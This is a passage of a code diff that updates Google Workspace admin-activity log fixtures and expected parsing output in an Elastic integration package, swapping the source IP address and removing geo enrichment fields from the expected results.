-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"CHROME_APPLICATION_LICENSE_RESERVATION_CREATED","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SKU_NAME","value":"sku"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"CHROME_APPLICATION_LICENSE_RESERVATION_DELETED","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SKU_NAME","value":"sku"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"CHROME_APPLICATION_LICENSE_RESERVATION_UPDATED","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SKU_NAME","value":"sku"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"CREATE_DEVICE_ENROLLMENT_TOKEN","parameters":[{"name":"FULL_ORG_UNIT_PATH","value":"full/org/path"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"ASSIGN_CUSTOM_LOGO","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"UNASSIGN_CUSTOM_LOGO","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"CREATE_ENROLLMENT_TOKEN","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"REVOKE_ENROLLMENT_TOKEN","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"CHROME_LICENSES_ALLOWED","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"CHROME_LICENSES_ALLOWED","value":"EMPTY"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"CREATE_ORG_UNIT","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"REMOVE_ORG_UNIT","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"EDIT_ORG_UNIT_DESCRIPTION","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"MOVE_ORG_UNIT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"EDIT_ORG_UNIT_NAME","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"REVOKE_DEVICE_ENROLLMENT_TOKEN","parameters":[{"name":"FULL_ORG_UNIT_PATH","value":"full/org/path"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"TOGGLE_SERVICE_ENABLED","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SERVICE_NAME","value":"new"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"CHROME_LICENSES_ENABLED","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"CHROME_LICENSES_ENABLED","value":"DISABLED"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"CHROME_APPLICATION_LICENSE_RESERVATION_CREATED","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SKU_NAME","value":"sku"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"CHROME_APPLICATION_LICENSE_RESERVATION_DELETED","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SKU_NAME","value":"sku"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"CHROME_APPLICATION_LICENSE_RESERVATION_UPDATED","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SKU_NAME","value":"sku"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"CREATE_DEVICE_ENROLLMENT_TOKEN","parameters":[{"name":"FULL_ORG_UNIT_PATH","value":"full/org/path"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"ASSIGN_CUSTOM_LOGO","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"UNASSIGN_CUSTOM_LOGO","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"CREATE_ENROLLMENT_TOKEN","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"REVOKE_ENROLLMENT_TOKEN","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"CHROME_LICENSES_ALLOWED","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"CHROME_LICENSES_ALLOWED","value":"EMPTY"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"CREATE_ORG_UNIT","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"REMOVE_ORG_UNIT","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"EDIT_ORG_UNIT_DESCRIPTION","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"MOVE_ORG_UNIT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"EDIT_ORG_UNIT_NAME","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"REVOKE_DEVICE_ENROLLMENT_TOKEN","parameters":[{"name":"FULL_ORG_UNIT_PATH","value":"full/org/path"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"TOGGLE_SERVICE_ENABLED","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SERVICE_NAME","value":"new"}]}}
diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-org.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-org.log-expected.json
index d47f4d6c70d..f056c45c276 100644
--- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-org.log-expected.json
+++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-org.log-expected.json
@@ -10,7 +10,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": {
@@ -34,35 +34,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:24.814988300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_LICENSES_ENABLED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"CHROME_LICENSES_ENABLED\",\"value\":\"DISABLED\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:50.954861Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_LICENSES_ENABLED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"CHROME_LICENSES_ENABLED\",\"value\":\"DISABLED\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "CHROME_LICENSES_ENABLED", "id": "1", @@ -92,7 +74,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -116,35 +98,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:24.814997Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_APPLICATION_LICENSE_RESERVATION_CREATED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SKU_NAME\",\"value\":\"sku\"}]}}", + "ingested": "2021-12-09T13:38:50.954864400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_APPLICATION_LICENSE_RESERVATION_CREATED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SKU_NAME\",\"value\":\"sku\"}]}}", "provider": "admin", "action": "CHROME_APPLICATION_LICENSE_RESERVATION_CREATED", "id": "1", 
@@ -174,7 +138,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -198,35 +162,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:24.814999400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_APPLICATION_LICENSE_RESERVATION_DELETED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SKU_NAME\",\"value\":\"sku\"}]}}", + "ingested": "2021-12-09T13:38:50.954869700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_APPLICATION_LICENSE_RESERVATION_DELETED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SKU_NAME\",\"value\":\"sku\"}]}}", "provider": "admin", "action": "CHROME_APPLICATION_LICENSE_RESERVATION_DELETED", "id": "1", 
@@ -256,7 +202,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -280,35 +226,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:24.815001400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_APPLICATION_LICENSE_RESERVATION_UPDATED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SKU_NAME\",\"value\":\"sku\"}]}}", + "ingested": "2021-12-09T13:38:50.954875700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_APPLICATION_LICENSE_RESERVATION_UPDATED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SKU_NAME\",\"value\":\"sku\"}]}}", "provider": "admin", "action": 
"CHROME_APPLICATION_LICENSE_RESERVATION_UPDATED", "id": "1", @@ -338,7 +266,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -362,35 +290,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:24.815003300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CREATE_DEVICE_ENROLLMENT_TOKEN\",\"parameters\":[{\"name\":\"FULL_ORG_UNIT_PATH\",\"value\":\"full/org/path\"}]}}", + "ingested": "2021-12-09T13:38:50.954881Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CREATE_DEVICE_ENROLLMENT_TOKEN\",\"parameters\":[{\"name\":\"FULL_ORG_UNIT_PATH\",\"value\":\"full/org/path\"}]}}", "provider": "admin", "action": "CREATE_DEVICE_ENROLLMENT_TOKEN", "id": "1", @@ -420,7 +330,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -444,35 +354,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:24.815005200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"ASSIGN_CUSTOM_LOGO\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:50.954884900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"ASSIGN_CUSTOM_LOGO\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "ASSIGN_CUSTOM_LOGO", "id": "1", @@ -502,7 +394,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -526,35 +418,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:24.815007100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"UNASSIGN_CUSTOM_LOGO\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:50.954889100Z", + "original": 